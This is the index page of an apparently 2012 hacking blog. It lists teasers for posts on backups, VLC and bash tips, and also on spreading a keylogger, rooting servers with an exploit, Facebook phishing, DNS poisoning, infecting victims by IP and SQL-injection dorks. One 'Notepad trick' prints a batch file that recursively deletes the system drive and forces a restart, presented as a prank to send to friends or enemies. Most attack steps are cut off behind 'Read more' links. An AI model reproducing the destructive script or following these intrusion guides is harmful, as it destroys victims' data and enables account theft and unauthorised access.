Saturday, 31 March 2012

How to safeguard your files when computer crashes



First thing to keep in mind: If your computer hasn't crashed yet, it will in the future! So instead of waiting for fate to strike, take some precautions now:

1) BACK-UP! Buy some decent DVD-R discs and put everything useful in them. When you have more useful stuff, backup again. Do this often.

2) Keep your computer healthy. Use an antivirus, an anti-spy, and a firewall. Keep them updated. Check regularly for Windows critical fixes.

Read more »

Saturday, 31 March 2012 by w4r-b0y · 0

Tuesday, 20 March 2012

How to hack a website[N00b Friendly]



So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP Address. Theres plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I'm not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

Read more »

Tuesday, 20 March 2012 by w4r-b0y · 0

Monday, 19 March 2012

How to edit meta tags of Media files using VLC Player

How to edit meta tags of audio and video files using VLC Player.



What are meta tags..??


In simple words, Audio and Video files contains some information about Title, Artist, Album, Genre, Date, Publisher, and more..

There are many meta tag editor available. But here is the way to edit them with VLC media player which is very popular media player at this time.

VLC media Player can be used to edit meta tags of both audio files as well as video files. :)

So, here is the way, just follow these simple steps:-

1) Open the media file in VLC Media Player and Click on Tools>>Media Information.



2) Thats it.!!Now you can edit all the meta tags and save them.





Alternative Method:-

There are many tools available out all over the internet, I found a tool named Mp3 Tag Editor which is Good to Edit MP3 file's meta tag. Download It here.

But VLC Media Player can edit almost every Audio and video file's Meta Tags.

Enjoy..!!!

Monday, 19 March 2012 by w4r-b0y · 1

Sunday, 18 March 2012

Some Basic Bash Commands



List of Some Basic BASH Commands:-

I'd like to point out to everyone before reading that this list is very far from completion and does not include all of the extendable possibilities. When I say this, nmap isn't a built-in command until you install nmap. These commands just stand for those that come with a Linux/UNIX BASH installation.

A

adduser Add a user to the system
addgroup Add a group to the system
alias Create an alias •
apropos Search Help manual pages (man -k)
apt-get Search for and install software packages (Debian)
aspell Spell Checker
awk Find and Replace text, database sort/validate/index

Read more »

Sunday, 18 March 2012 by w4r-b0y · 0

Saturday, 17 March 2012

Misconceptions About Computer Worms


Misconceptions About Computer Worms And An Insight Into There Creation


Intro

There are a few misconceptions that some members have about Internet Worms and their behavior.all too often i hear people saying "Oh it looks like you have been infected by some kind of worm" and almost 99% of the time they are completely wrong. So here goes my attempt to clear up a few things on worms.

Definition

A computer worm is a self-replicating Malware computer program. It uses a computer network to send copies of itself to other nodes (computers on the network) and it may do so without any user intervention. This is due to security shortcomings on the target computer.

REF:en.wikipedia.org/wiki/Computer_worm

Read more »

Saturday, 17 March 2012 by w4r-b0y · 0

Some Common Terms in Hacking Explained



Q: What is hacking?


A: The terms "hack" are also used to refer to a modification of a program or device to give the user access to features that were otherwise unavailable, such as DIY circuit bending. It is from this usage that the term "hacking" is often incorrectly used to refer to more nefarious criminal uses such as identity theft, credit card fraud or other actions categorized as computer crime


Q: What is cracking?
A: Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords. On a file-by file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.


Read more »

by w4r-b0y · 0

Some Useful CMD Commands



Here are some Useful Things to do on CMD!!



First, open your Network Connection and right click and select Properties. Then Select TCP/IP and click on Properties again. Now Click on Advanced and WINS tab. Select Default for NeBIOS.


Now back to the main Local Area Connection window, select File and Print Sharing for Mic*ft Networks and hit enter.


This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.


First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).


In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, off course... you know the drill).


Back to commands:


Commands:-
nslookup,
net view,
net use,
net user,
ping,
tracert,
arp route,
nbtstat,
netstat
ipconfig.

Read more »

by w4r-b0y · 0

Friday, 16 March 2012

How to setup a keylogger(ardamax) and Spread it [Step by Step]


Ardamax Keylogger 2.85 Complete Download + Tutorial + Guide

Download the keylogger here.

Please Turn off your anti-virus....It is because keylogging is basically a trojan builder it will show detection...I have checked the copy and it is clean version...


SETTING-UP KEYLOGGER:-

Read more »

Friday, 16 March 2012 by w4r-b0y · 0

Server Rooting Tutorial + Using h00lyshit Exploit



I will show you how to exploit a Linux server and gain root access. This will benefit you in many ways, for example having control of all websites hosted on the server. Enough talking, let's begin!

Requirements for this tutorial:

- A shelled website.
- NetCat installed on your computer.
- Patience
- Port 443 or any other except 80 opened on your router.

Read more »

by w4r-b0y · 1

Thursday, 15 March 2012

Some Notepad Hacks and Tricks




Here are some Notepad Tricks to make your friend/enemy look  O.o  :O

The blue screen of Death [This might be dangerous]
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again


CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

save it as "Anything.bat"

Read more »

Thursday, 15 March 2012 by w4r-b0y · 0

How to infect victim using his IP address




Many of the times I saw this question asked everywhere on the internet that
“Is it possible to infect victim using his IP address?”

So, I am going to show you how to do it.(n00b friendly TuT)

Read more »

by w4r-b0y · 0

Wednesday, 14 March 2012

How To Create A Invisible Account In Windows Xp


Here is a Quick tutorial on for windows XP on How To Create A Invisible Account In Windows Xp. What we have do in this hack is really simple just create a DWORD value in the windows registry and hack the windows user accounts .

Read more »

Wednesday, 14 March 2012 by w4r-b0y · 0

How to Detect Fake Facebook Profile



In Facebook, things are not all as it seems: there are people who are under false names, pictures, interests and even friends. You look at their profile and think “something here does not fit.” These characters seek to trick legitimate users the purpose of sending unsolicited advertising, steal personal information or engage in various scams.

We present a few simple rules to identify fake profiles on Facebook and prevent you from falling prey to this schemes. It’s easier than you think.

A fake profile of Facebook users actively seeks out others, sending friend requests, liking pages and posting messages on walls outside.

Read more »

by w4r-b0y · 0

How To Perform DNS Poisoning attack




Hey guys Smile this Tutorial is about DNS poisoning on your network using Cain & Abel.

Download Cain here

This Tutorial Will be limited to just redirecting the traffic to another website.



Note: This Tutorial is for educational purposes only (you’ll be responsible for your own actions)


Read more »

by w4r-b0y · 2

Tuesday, 13 March 2012

Anonymous Web surfing With TOR




We all many times use proxies for staying anonymous on internet. Lets quickly check out , what we are actually doing while using proxies. We first connect to a proxy server which brings resources requested by us from the web server.


Thus a proxy server hides our identity by acting as an intermediary between us and the web server that we are accessing. Suppose we break into a server using a proxy server thinking that we are anonymous. But what if owner of web server starts enquiring about the clients connecting to it using the proxy server and it is possible that owners of proxy server might reveal our identity. This means we cant actually rely on proxy servers for being anonymous online. Here comes the concept of THE ONION ROUTING (TOR) into picture. By using this , the client traffic is supposed to be passed from three different servers or nodes before reaching to actual web server. It may randomly take any path through any three nodes.

Read more »

Tuesday, 13 March 2012 by w4r-b0y · 0

How To Hack Facebook Accounts with Phishing [Step by Step]



Now im gonna make a step by step tutorial for facebook accounts..


ONE!:

go to "www.facebook.com/login.php" and right click on some white space
on the page and press "view source code". A LOT of text is gonna appear,
copy it all to notepad.


Read more »

by w4r-b0y · 0

Collection of 25000+ SQL Injection Google Dorks





The almighty Google is just a search engine for common users, but, for hackers this search engine helps them to use Google Dorks (Kinda God Gift For Newbies) :


Google dorks are the center of the Google Hacking. Many hackers use google to find vulnerable webpages and later use these vulnerabilities for hacking.


Many types of Dorks are used for this purpose-
But here I have a vast collection of more than 25000+ SQLi google dorks:-   

Read more »

by w4r-b0y · 0

How to Crash PC using E Bomb



WHAT IS AN E-BOMB ??

An E-Bomb is some kind of program that opens many windows, and crashes the target computer.

This guide can be followed by any one, but the only problem is getting the victim to open the executable file.

First of all, download this and follow the below illustrated steps  :

Read more »

by w4r-b0y · 0

Monday, 12 March 2012

8 Top Facebook Security Tips



World wide web is now expending, Internet has successfully turn the whole world into a village and for doing this social networks played and playing an important role, in the era of social networks there is a facebook,  Facebook has a large number of user's and it is on hit list of attacker's and scam-er.
While you are using facebook or any social networking website there is a need to protect your information by using effective privacy techniques.
This article will talk about some security issues and their countermeasure on facebook or it can be applicable on other social networking websites.

Read more »

Monday, 12 March 2012 by w4r-b0y · 0

What are Trojan / Worm / Virus / Logic Bomb??





We generally hear some terms like Trojan / Worm / Virus / Logic Bomb,etc..
By the way what are these???
Read and know about them below:


Read more »

by w4r-b0y · 0

How to find a Vulnerable Website and Start Hacking ??





Now a days Website Hacking has become a tradition or fun to create problems for other people. Hackers are searching for finding the holes in the websites having high page ranks and traffic.
Many newbies don't know that how to find security holes in random sites..??
Now here is an easy way to do so.. :)


Follow the following steps.

Read more »

by w4r-b0y · 0

Saturday, 10 March 2012

How To Crack WiFi WEP With Packet Injection


Intro

By now most people have wireless networks at home. A lot of them may have experienced leechers or have leeched themselves through an open network. An easy way to prevent that from happening is to encrypt your network traffic. One of these methods is by use of WEP or Wired Equivalent Privacy. I’m going to talk about why you shouldn’t use WEP and how easy it is to crack.

Read more »

Saturday, 10 March 2012 by w4r-b0y · 0

How to get anyone's IP address


.



Here's easy trick to find IP addresse of any one ,we can use it to find anyone's Ip easily while chatting in GTalk, Facebook, Yahoo messenger or anywhere else. You can also use it in a E-mail to find the Ip of the Recieptent.

Process:

Read more »

by w4r-b0y · 0

Wednesday, 7 March 2012

Exploit Classification / Shellcode


======================================================
Exploit Classification / Shellcode (computer security)
======================================================



#[+] Discovered By   : Inj3ct0r
#[+] Site                   : Inj3ct0r.com
#[+] support e-mail   : submit[at]inj3ct0r.com

?----------------[0x01]---> EXPLOIT ;
?----------------[0x02]---> Shellcode ;
                                         // English description, review / Russia

// English

Read more »

Wednesday, 7 March 2012 by w4r-b0y · 0

All Rights Reserved Walk With-[Geeks]- by w4r-b0y
Special Thanx to Team Indishell and The Almighty Google